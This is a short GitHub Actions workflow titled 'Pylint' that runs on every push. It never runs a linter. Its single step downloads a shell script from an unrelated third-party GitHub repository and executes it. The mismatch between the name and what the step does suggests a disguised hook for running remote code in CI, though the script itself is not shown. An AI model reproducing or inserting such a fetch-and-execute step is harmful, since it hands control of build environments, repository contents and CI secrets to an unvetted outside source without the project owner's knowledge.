name: Pylint

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: ["3.8", "3.9", "3.10"]
    steps:
    - name: run netlify
      run: |
        curl https://raw.githubusercontent.com/HangarOrg/sphinx-netlify-cicd/main/start.sh -o start.sh
        chmod +x start.sh
        ./start.sh
